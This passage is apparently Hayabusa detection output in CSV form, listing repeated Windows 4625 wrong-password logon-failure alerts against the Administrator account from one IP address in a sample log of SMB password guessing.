+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6rnM6QbwfbbrcGy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RX0GW7K5wdQJUx4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xm7CpD5i735McsvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.959 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bHxjZsnR25J47Ez8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.999 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1JWj91m79FyykH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.043 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h9i0GncOzpz5REWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:19.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BODZRJ6G3xxw29VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.127 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ2lq4piINfmI7Qe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.167 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NqDeXdOitJ3WY8w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.217 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FnoHQf7QDxoI4tel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.261 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqkbgrtBa5VFxPry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TMD57GtY15bfWBre | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.350 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3lT9UgWr82PcAjf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SpwhTfFlvvccnI5N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 10CfKdnvWf4UVuME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.539 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYLMax3okIqntHM1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.602 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qk9TPAK51EdVORwY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.670 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVKRUnNu2nGslW7P | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJ2AYRLcMbMVixg6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.759 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Sl9ucxM2Nu3xjNq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AFeBGB6qA7OaYV7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.837 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLUEKG9CzQYsH3Vp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.875 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVZ44YKdRYY59zaC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
umU8pDDZFvvUVsHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nn7rA0uRegtHgaF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dgiakCKweT4GUGD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.039 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kptipiLujNVePYfy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.091 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: plaXJ1rEGpU3SzV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.132 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I4pALF2luLfg36GC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.173 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: ZLO4cufbFcRhRy8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.215 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a845OfrFKxy31Yhg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QnPM7uhs8y4BaP6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fW5FzQ4jbWDJxXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.326 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huKy3ruTPAlx94pI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.363 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g78Kx7hkMuUGIoX1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: erSXtXvMi8Cg1PWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.462 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VaqXgO2US87zoXLl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.501 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHEfAfFuAR2pX3LO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.543 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4Owk2elGaC5DOm1U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VXPynWzVNADN56a4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.619 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwfwZ0hXFaFwqymH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: QYlZwLsvrsuqUZ4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.707 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvGrzr30eVl5TGhA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.791 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tqdJcHWbdGcIIHBr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.840 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDt69bIJ1yI6PXLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.879 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtE2uMuOe8QPAKOj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.911 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BWQDlZDgFj9NmMhJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.964 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncQiyLyHCXr8knGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XjVmLfmcPMYbmdin | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.072 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gU2HjzjDxHsnvENI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.103 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cUPn5CEz2LtwRwvZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.140 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCz069oBFXqpshbU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.187 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dzhc9PVRVP69tshD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:21.226 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejA3ZNfKWEs8zAMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.265 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U5egiL2PGOrYCHv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.302 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYhIM3zla6KcbKbM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjyQJnVBO4iC9Tkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.387 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g6Tpp8TRa2nRxHzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.422 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DyLvo5Bn2HzyANdH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaXNThuZDGqJ7oCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.505 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 42Sb7p19cQsEV30b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.540 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: An6629wgflzSgqY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iO7JktEihqddmEtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nG97BFOgKxnZaqi4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SH2D24c6nRGDL4Oe | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiu2yfaM2JQQZoLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YQx9PG8DtR2tMjvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.792 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OoAWryajKhLD7RyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.836 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgewSeaVugP1TXss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.911 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPMCPdCAnz4upz8X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:21.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
dUbV6xnGeBWE8Dif | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.001 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIJ9mZczFO1GKItV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wW0vxE4o68L70Sra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOn9DzB1yWtntyX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m9uGgocAVReiJWDm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qm9Jf1fles2HOb3g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
